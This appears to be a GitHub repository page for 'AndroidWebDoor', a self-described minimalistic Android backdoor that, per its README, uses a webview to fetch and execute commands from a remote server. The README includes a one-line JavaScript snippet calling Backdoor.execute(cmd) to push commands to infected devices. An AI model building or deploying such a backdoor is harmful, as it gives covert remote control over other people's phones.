Skip to content

netwerk5/AndroidWebDoor

 
 

Repository files navigation

AndroidWebDoor

For research purposes only !!

Minimalistic Android Backdoor based on a single webview which fetches and executes commands from a remoter server. From Server's side, simply add javascript code that sends the command to the client:

<script type="text/javascript"> function execCmd(cmd) { Backdoor.execute(cmd); } </script>

TODO: Implement the server side code in python.

About

A minimalistic android backdoor

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Java 100.0%